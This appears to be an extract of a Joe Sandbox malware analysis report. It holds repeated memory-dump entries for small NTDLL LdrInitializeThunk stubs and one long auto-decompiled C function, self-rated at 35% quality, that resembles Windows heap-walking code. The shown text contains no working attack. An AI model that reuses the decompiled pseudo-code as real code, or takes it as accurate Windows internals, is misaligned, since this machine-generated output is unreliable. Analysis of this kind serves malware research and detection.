Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 63d7da9c7295468241c2daef23ed9df3ebb34b7515f8187fb0e9efc47eba346a
Instruction ID: 850538e1104030eeb43ed33b32a5b103037c92d7b47eb335a05cb49be9a5e60b
Opcode Fuzzy Hash: 63d7da9c7295468241c2daef23ed9df3ebb34b7515f8187fb0e9efc47eba346a
Instruction Fuzzy Hash: A190022134140003E54071585998607400597F1346F51D416E0416554CD975CC5A6232

Uniqueness

Uniqueness Score: -1.00%

Function 341B2CF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2CFA

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6571a7e64232447e44176510726a42b64322eeb2b3e040ca9bcaf3746a9061f8
Instruction ID: dbe79bb5d95419fd08fdf044eefd5ff319dc6aa61d34091aa9a0e172c2c5fdd0
Opcode Fuzzy Hash: 6571a7e64232447e44176510726a42b64322eeb2b3e040ca9bcaf3746a9061f8
Instruction Fuzzy Hash: 93900221282441526945B1584984507400657F0286791C417A1416950CC576DC5AE631

Uniqueness

Uniqueness Score: -1.00%

Function 341B2D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2D1A

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 61c850586179994438822b39dde706af0fed5b6e7faa460178a23e8ab8b5a144
Instruction ID: 4a2b7e8ab4416bc78397848fd20be69b247db25289ab7dcadb67485ec774a7ff
Opcode Fuzzy Hash: 61c850586179994438822b39dde706af0fed5b6e7faa460178a23e8ab8b5a144
Instruction Fuzzy Hash: E490023124140413E51161584A84707000947E0286F91C817A0426558DD6B6CD56B131

Uniqueness

Uniqueness Score: -1.00%

Function 341B2DA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2DAA

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: edfd191de4543b87b5c521e522f31d7c58e460abcfa33b2e71782c6e17c56c8f
Instruction ID: 0ba571eea05792d76bd873352dd0c58345d1dd48b8bbf48602f78098131ae3de
Opcode Fuzzy Hash: edfd191de4543b87b5c521e522f31d7c58e460abcfa33b2e71782c6e17c56c8f
Instruction Fuzzy Hash: F190022164140502E50171584984617000A47E0286F91C427A1026555ECA75CD96B131

Uniqueness

Uniqueness Score: -1.00%

Function 341B2DC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2DCA

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3656562624ec46d57623a15b48744f72cd9da97f76d4ce2e2823ab8b8a6c2bf
Instruction ID: a6febe865f5d4338c09898583ea7d05e77f2811fb1fdb8fe3cb13d1559be0e03
Opcode Fuzzy Hash: a3656562624ec46d57623a15b48744f72cd9da97f76d4ce2e2823ab8b8a6c2bf
Instruction Fuzzy Hash: 6490027124140402E54071584984747000547E0346F51C416A5066554EC6B9CDD97675

Uniqueness

Uniqueness Score: -1.00%

Function 341B2E50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2E5A

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5dafaaf7d54bfe218f1f3936d03f37b3e7ab7eeea2504826c2f9072b111b4b07
Instruction ID: e05f81bbc1a53c0795a9bcaea3d802a1c3aa7e51a9ab40a2bb0229e3fea028c4
Opcode Fuzzy Hash: 5dafaaf7d54bfe218f1f3936d03f37b3e7ab7eeea2504826c2f9072b111b4b07
Instruction Fuzzy Hash: 2D90026138140442E50061584994B07000587F1346F51C41AE1066554DC679CC567136

Uniqueness

Uniqueness Score: -1.00%

Function 341B2EB0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2EBA

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad64ed6bd464f48814d866c946808110c1c8b6074ca3616896fa934b01036e41
Instruction ID: b7583dfe4d5b775b7ff2fefab7eef350e72ab40ae17df9de48ff8a0e2358c3cb
Opcode Fuzzy Hash: ad64ed6bd464f48814d866c946808110c1c8b6074ca3616896fa934b01036e41
Instruction Fuzzy Hash: 3B90023124180402E50061584D9470B000547E0347F51C416A1166555DC675CC557571

Uniqueness

Uniqueness Score: -1.00%

Function 341B2ED0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2EDA

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b011c76f4822aa484a1bb42ec8cfa4dca3293a58b529724c53ae784a289ba983
Instruction ID: f5707de0982af5fae4415c4f250e9f59f32eca249224f4a95ae724219d8c6ae9
Opcode Fuzzy Hash: b011c76f4822aa484a1bb42ec8cfa4dca3293a58b529724c53ae784a289ba983
Instruction Fuzzy Hash: 3290022164140042554071688DC490740056BF1256751C526A099A550DC5B9CC696675

Uniqueness

Uniqueness Score: -1.00%

Function 341B2F00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2F0A

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d661b443effb10fb3b778c05fb478b7a69118f9d9070ed3bfa641fe2b32a1779
Instruction ID: e83f0fbf168732bf9ab40044f15a8e7495d4fdc644601c16bbdb21cbecd3e479
Opcode Fuzzy Hash: d661b443effb10fb3b778c05fb478b7a69118f9d9070ed3bfa641fe2b32a1779
Instruction Fuzzy Hash: F7900221251C0042E60065684D94B07000547E0347F51C51AA0156554CC975CC656531

Uniqueness

Uniqueness Score: -1.00%

Function 341B29F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B29FA

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9d61628cc2a867f3ba2e7e6bd3fbbfc388b4ec6b842a5c8f036eaadfa354039
Instruction ID: 1b73b515e4c6795975d5f9fb251169d023fb89bcdde2df0b6c9a11097d39224c
Opcode Fuzzy Hash: f9d61628cc2a867f3ba2e7e6bd3fbbfc388b4ec6b842a5c8f036eaadfa354039
Instruction Fuzzy Hash: AD900225251400031505A5580B84507004647E5396351C426F1017550CD671CC656131

Uniqueness

Uniqueness Score: -1.00%

Function 341B2A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2A8A

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f40a4beb99c7a1180eaf0aa2c2634b3d615ea32d99e97c8baf028c64c67c6955
Instruction ID: 1a5b53918cbed798f4117e074ba870d815e8bfd7b1bdc91f10657421b2b4a075
Opcode Fuzzy Hash: f40a4beb99c7a1180eaf0aa2c2634b3d615ea32d99e97c8baf028c64c67c6955
Instruction Fuzzy Hash: 6390026124240003550571584994617400A47F0246B51C426E1016590DC575CC957135

Uniqueness

Uniqueness Score: -1.00%

Function 341B2B10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2B1A

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7935ddc53262d92f427ea7dba6c5484d0cd216fc262d05199421b17c36c8aaf5
Instruction ID: cf1f4d938f57887b7991d9c584ff341047510f47c5fe01697cd75283938d7bd1
Opcode Fuzzy Hash: 7935ddc53262d92f427ea7dba6c5484d0cd216fc262d05199421b17c36c8aaf5
Instruction Fuzzy Hash: 0890023124140802E5807158498464B000547E1346F91C41AA0027654DCA75CE5D77B1

Uniqueness

Uniqueness Score: -1.00%

Function 341B2B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2B9A

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2aef4e6c3b5445c5ae662c2db53307d797e5a1a87c9380ea5c2512c1ba7aeeac
Instruction ID: ac28d547f3efb622c62e3d002c0757917800622dcca1ad1dc5bf7709959e5bbd
Opcode Fuzzy Hash: 2aef4e6c3b5445c5ae662c2db53307d797e5a1a87c9380ea5c2512c1ba7aeeac
Instruction Fuzzy Hash: 7A90023124148802E5106158898474B000547E0346F55C816A4426658DC6F5CC957131

Uniqueness

Uniqueness Score: -1.00%

Function 341B2BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 341B2BCA

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 58a43dcc01d20ef35bffd0ad5e0b8294360d0a8afb562349c79475017f01cd7c
Instruction ID: d8de15dab8e755b6ee162202b8e2345fc88411d49e520bccc59074e7854c0c44
Opcode Fuzzy Hash: 58a43dcc01d20ef35bffd0ad5e0b8294360d0a8afb562349c79475017f01cd7c
Instruction Fuzzy Hash: BC90023124140402E50065985988647000547F0346F51D416A5026555EC6B5CC957131

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 34219060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558
timeCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E34219060(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v18;
				short _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void _v172;
				signed int _v176;
				signed int _v180;
				intOrPtr _v184;
				signed int _v188;
				short _v190;
				short _v192;
				signed int _v196;
				signed int _v198;
				signed int _v200;
				signed int _v204;
				signed int _v206;
				void _v208;
				signed int* _v212;
				signed int _v214;
				void* _v216;
				intOrPtr _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				char _v233;
				char _v236;
				signed int _v240;
				signed int _v241;
				intOrPtr* _v244;
				intOrPtr _v248;
				signed int _v249;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t299;
				signed int _t310;
				signed int _t315;
				signed int _t316;
				signed int _t321;
				signed int _t322;
				char* _t323;
				signed int _t325;
				signed int _t329;
				signed int _t333;
				signed int* _t334;
				signed int _t349;
				signed int _t352;
				signed int _t357;
				signed int _t367;
				signed int _t373;
				intOrPtr _t422;
				signed int _t423;
				signed int _t424;
				void* _t427;
				signed int _t429;
				signed int _t431;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr _t444;
				signed int _t448;
				signed int _t452;
				void _t458;
				signed int _t461;
				signed int _t464;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t471;
				signed int _t472;
				intOrPtr _t475;
				intOrPtr _t478;
				signed int _t480;
				intOrPtr* _t484;
				void* _t485;
				intOrPtr _t488;
				intOrPtr _t489;
				signed int _t492;
				signed int _t495;
				signed int _t496;
				signed int _t499;
				void* _t500;
				signed int _t501;
				signed int _t503;

				_t503 = (_t501 & 0xfffffff8) - 0xec;
				_v8 =  *0x3426b370 ^ _t503;
				_t299 = _a8;
				_t499 = _a4;
				_t434 = 0;
				_t482 =  *_t299;
				_t484 =  *((intOrPtr*)(_t299 + 4));
				_v204 = _t482;
				_v232 =  *((intOrPtr*)(_t299 + 8));
				_v228 = _t484;
				_v68 = 0;
				if( *((intOrPtr*)(_t499 + 8)) != 0xddeeddee) {
					__eflags =  *(_t499 + 0x44) & 0x01000000;
					_v233 = 0;
					_v212 = 0;
					if(( *(_t499 + 0x44) & 0x01000000) == 0) {
						goto L2;
					} else {
						_t310 = 0xc0000002;
						goto L98;
					}
				} else {
					_v233 = 1;
					_v212 = _t499;
					L2:
					if(_t482 != 0x80000000) {
						E341B8F40( &_v156, _t434, 0x54);
						_t503 = _t503 + 0xc;
						_v172 = 2;
						_v168 = 0x20;
						_v164 = _t499;
						__eflags = _v233 - _t434;
						if(_v233 != _t434) {
							_t444 = _v212;
							_v160 = _t434;
							_v156 =  *(_t444 + 0x80) << 0xc;
							_v156 = _v156 + ( *(_t444 + 0x4c) << 0xc);
							_v152 =  *(_t444 + 0x84) << 0xc;
							_t81 =  &_v152;
							 *_t81 = _v152 + ( *(_t444 + 0x50) << 0xc);
							__eflags =  *_t81;
							_t310 = _t434;
						} else {
							_t482 =  &_v156;
							_v160 =  *(_t499 + 0xea) & 0x000000ff;
							_t310 = L342198AA(_t499,  &_v156,  &_v152);
						}
						__eflags = _t310;
						if(_t310 < 0) {
							L98:
							_pop(_t485);
							_pop(_t500);
							_pop(_t435);
							return L341B4B50(_t310, _t435, _v8 ^ _t503, _t482, _t485, _t500);
						} else {
							 *0x342691e0( &_v172, _v232);
							_t310 =  *_t484();
							__eflags = _t310;
							if(_t310 < 0) {
								goto L98;
							}
							_t482 = _v212;
							__eflags = _t482 - 3;
							if(_t482 < 3) {
								goto L98;
							}
							_v232 = _t434;
							__eflags = _t482 - 3;
							_v228 = _t434;
							_t448 = 7;
							_t315 = memset( &_v208, 0, _t448 << 2);
							_t503 = _t503 + 0xc;
							_t316 = _t315 & 0xffffff00 | __eflags > 0x00000000;
							_t488 = 0;
							__eflags = 0;
							_v224 = _t316;
							while(1) {
								_t482 =  &_v208;
								_t310 = E3421A388(_t499,  &_v208, _t316);
								__eflags = _t310 - 0x8000001a;
								if(_t310 == 0x8000001a) {
									break;
								}
								__eflags = _t310;
								if(_t310 < 0) {
									goto L98;
								}
								_t436 = _v198;
								__eflags = _t436 & 0x00000002;
								if((_t436 & 0x00000002) == 0) {
									__eflags = _t436 & 0x00004000;
									if((_t436 & 0x00004000) == 0) {
										__eflags = _t436 & 0x00001000;
										if((_t436 & 0x00001000) == 0) {
											__eflags = _v241;
											if(_v241 != 0) {
												L75:
												__eflags = _v212 - 4;
												_t316 = _v224;
												if(_v212 < 4) {
													continue;
												}
												L76:
												__eflags = _t436 & 0x000000f0;
												if((_t436 & 0x000000f0) == 0) {
													E341B8F40( &_v180, _t488, 0x64);
													_t503 = _t503 + 0xc;
													_v172 = _v208;
													_v164 = _v204;
													_t321 = _v188;
													_v180 = 5;
													_v176 = 0x1c;
													__eflags = _t436 & 0x00000002;
													if((_t436 & 0x00000002) != 0) {
														_t321 = _v200 & 0x000000ff;
													}
													_v160 = _t321;
													__eflags = _t436 & 0x00000001;
													if((_t436 & 0x00000001) == 0) {
														_t322 = _v168;
													} else {
														_t322 = 1;
														_v168 = 1;
													}
													__eflags = _t436 & 0x00004000;
													if((_t436 & 0x00004000) == 0) {
														__eflags = _t436 & 0x00008000;
														if((_t436 & 0x00008000) == 0) {
															goto L94;
														}
														_t325 = _t322 | 0x00000008;
														__eflags = _t325;
														goto L93;
													} else {
														_t325 = _t322 | 0x00000004;
														L93:
														_v168 = _t325;
														L94:
														_t323 =  &_v180;
														L95:
														 *0x342691e0(_t323, _v240);
														_t310 =  *_v236();
														__eflags = _t310;
														if(_t310 < 0) {
															goto L98;
														}
														L96:
														_t316 = _v232;
														continue;
													}
												}
												_t452 = _v188;
												_v56 = _v208;
												_v48 = _v204;
												_t329 = 2;
												_v40 = _t488;
												_v36 = _t488;
												_v64 = 5;
												_v60 = 0x30;
												_v52 = _t329;
												__eflags = _t329 & _t436;
												if((_t329 & _t436) != 0) {
													_t452 = _v200 & 0x000000ff;
												}
												_v44 = _t452;
												__eflags = _t436 & 0x00004000;
												if((_t436 & 0x00004000) != 0) {
													_t329 = 6;
													_v52 = _t329;
												}
												__eflags = _t436 & 0x00000001;
												if((_t436 & 0x00000001) != 0) {
													_t333 = _t329 | 0x00000001;
													__eflags = _t333;
													_v52 = _t333;
												}
												_v24 = _v196;
												_v20 = _v192;
												_v18 = _v190;
												_t323 =  &_v64;
												_v32 = 1;
												_v28 = 0x14;
												goto L95;
											}
											_t334 = _v208;
											__eflags = _t334 - _v232;
											if(_t334 < _v232) {
												L72:
												_t482 = _t334;
												E34218093(_v76, _t334,  &_v232,  &_v228,  &_v68,  &_v216);
												__eflags = _v228 - 4;
												if(_v228 < 4) {
													goto L96;
												}
												E341B8F40( &_v180, _t488, 0x64);
												_t458 = _v232;
												_t503 = _t503 + 0xc;
												_v168 = _v228 - _t458;
												_v160 = _v216;
												_v172 = _t458;
												_v180 = 4;
												_v176 = 0x20;
												_v164 = 1;
												 *0x342691e0( &_v180, _v240);
												_t310 =  *_v236();
												__eflags = _t310;
												if(_t310 < 0) {
													goto L98;
												}
												_t436 = _v206;
												goto L75;
											}
											__eflags = _t334 - _v228;
											if(_t334 <= _v228) {
												goto L75;
											}
											goto L72;
										}
										__eflags = _v212 - 4;
										_t316 = _v224;
										if(_v212 < 4) {
											continue;
										}
										E341B8F40( &_v180, _t488, 0x64);
										_t503 = _t503 + 0xc;
										_v172 = _v208;
										_t325 = _v204;
										_v180 = 4;
										_v176 = 0x20;
										_v164 = 2;
										_v160 = 1;
										goto L93;
									}
									E341B8F40( &_v172, 0, 0x5c);
									_t503 = _t503 + 0xc;
									_v180 = 3;
									_t496 = 0;
									_v176 = 0x1c;
									_v72 = 0;
									__eflags = _v241;
									if(_v241 != 0) {
										_t482 = _v208;
										_t349 = _v220 + 0x44;
										_v172 = _t482;
										__eflags =  *(_t349 + 4) & 0x00000001;
										_t496 =  *_t349;
										if(( *(_t349 + 4) & 0x00000001) != 0) {
											__eflags = _t496;
											if(_t496 == 0) {
												_t496 = 0;
											} else {
												_t496 = _t496 ^ _t349;
											}
										}
										_t461 =  *(_t349 + 4) & 1;
										while(1) {
											__eflags = _t496;
											if(_t496 == 0) {
												break;
											}
											__eflags = _t482 - ( *(_t496 + 0xc) & 0xffff0000);
											if(__eflags < 0) {
												_t352 =  *_t496;
												L54:
												__eflags = _t461;
												if(_t461 == 0) {
													L57:
													_t496 = _t352;
													continue;
												}
												__eflags = _t352;
												if(_t352 == 0) {
													goto L57;
												}
												_t496 = _t496 ^ _t352;
												continue;
											}
											if(__eflags <= 0) {
												break;
											}
											_t352 =  *(_t496 + 4);
											goto L54;
										}
										_v168 = ( *(_t496 + 0x10) & 0xfffff000) + 0x1000;
										_t357 =  *(_t496 + 0x10) & 0xfffff000;
										__eflags = _t357;
										L60:
										_v164 = _t357;
										 *0x342691e0( &_v180, _v240);
										_t310 = _v236();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										}
										E341B8F40( &_v176, 0, 0x58);
										_t503 = _t503 + 0xc;
										_v184 = 0x20;
										_t464 = 4;
										_v188 = _t464;
										__eflags = _v249;
										if(_v249 != 0) {
											_v180 = _v216;
											_v176 =  *(_t496 + 0x10) & 0xfffff000;
											_t367 =  *(_v228 + 0xc) & 0x40000000;
											__eflags = _t367;
										} else {
											_t373 = _v80;
											_v180 = _t373;
											_v176 =  *((intOrPtr*)(_t373 + 0x10));
											_t367 =  *(_t499 + 0x40) & 0x00040000;
										}
										_v172 = 1;
										asm("sbb eax, eax");
										_v168 = ( ~_t367 & 0x0000003c) + _t464;
										 *0x342691e0( &_v188, _v248);
										_t310 =  *_v244();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										} else {
											_t436 = _v214;
											_t488 = 0;
											goto L76;
										}
									}
									_t467 = _v208 + 0xfffffff8;
									__eflags =  *((char*)(_t467 + 7)) - 5;
									if( *((char*)(_t467 + 7)) == 5) {
										_t467 = _t467 - (( *(_t467 + 6) & 0x000000ff) << 3);
										__eflags = _t467;
									}
									_t468 = _t467 + 0xffffffe8;
									_v72 = _t468;
									_v172 = _t468 & 0xffff0000;
									_v168 =  *((intOrPtr*)(_t468 + 0x14));
									_t357 =  *(_t468 + 0x10);
									goto L60;
								}
								__eflags = _v241;
								if(_v241 != 0) {
									L30:
									_t489 = _v208;
									L31:
									E341B8F40( &_v160, 0, 0x50);
									_t469 = _v196;
									_t503 = _t503 + 0xc;
									_v172 = _t489;
									_v168 = _v192 + _t469;
									_v164 = _t469;
									_v180 = 3;
									_v176 = 0x1c;
									 *0x342691e0( &_v180, _v240);
									_t310 =  *_v236();
									__eflags = _t310;
									if(_t310 < 0) {
										goto L98;
									}
									__eflags = _v249;
									if(_v249 != 0) {
										_t471 = _v216;
										_v236 = _v204 + _t471;
										_t492 =  *(_v228 + 0xc) & 0x40000000;
										__eflags = _t492;
										L37:
										_v240 = _t471;
										asm("sbb edi, edi");
										_t495 = ( ~_t492 & 0x0000003c) + 4;
										__eflags = _t495;
										_v224 = _t495;
										L38:
										E341B8F40( &_v188, 0, 0x64);
										_t472 = _v240;
										_t503 = _t503 + 0xc;
										_v176 = _v236 - _t472;
										_v180 = _t472;
										_v188 = 4;
										_v184 = 0x20;
										_v172 = 1;
										_v168 = _t495;
										 *0x342691e0( &_v188, _v248);
										_t310 =  *_v244();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										}
										_t488 = 0;
										goto L96;
									}
									__eflags = _v206 & 0x00008000;
									if((_v206 & 0x00008000) != 0) {
										_t471 = _v216;
										_v236 = _v204 + _t471;
										_t492 =  *(_t499 + 0x40) & 0x00040000;
										goto L37;
									}
									_t482 = _v84;
									E34218093(_v84, _v84,  &_v240,  &_v236,  &_v76,  &_v224);
									_t495 = _v240;
									goto L38;
								}
								__eflags = _t436 & 0x00008000;
								if((_t436 & 0x00008000) != 0) {
									goto L30;
								}
								_t475 = _v208;
								_v76 = _t475;
								__eflags = _t475 + 0x10 -  *((intOrPtr*)(_t499 + 0xa4));
								if(_t475 + 0x10 !=  *((intOrPtr*)(_t499 + 0xa4))) {
									_t489 = _t475;
								} else {
									_t489 = _t499;
								}
								goto L31;
							}
							_t310 = 0;
							__eflags = 0;
							goto L98;
						}
					}
					E341B8F40( &_v164, _t434, 0x5c);
					_t503 = _t503 + 0xc;
					_v172 = 0x80000000;
					_v168 = 0x64;
					if(_v233 == _t434) {
						_v156 =  *(_t499 + 0x7c) & 0x0000ffff;
						_v160 = 1;
						_v148 = _t499;
						_v152 =  *((intOrPtr*)( *[fs:0x30] + 0x88)) - 1;
						_v144 =  *((intOrPtr*)(_t499 + 0x1f4));
						_v140 =  *((intOrPtr*)(_t499 + 0x1f8)) -  *((intOrPtr*)(_t499 + 0x244));
						_v124 = E3421D7E5(_t499);
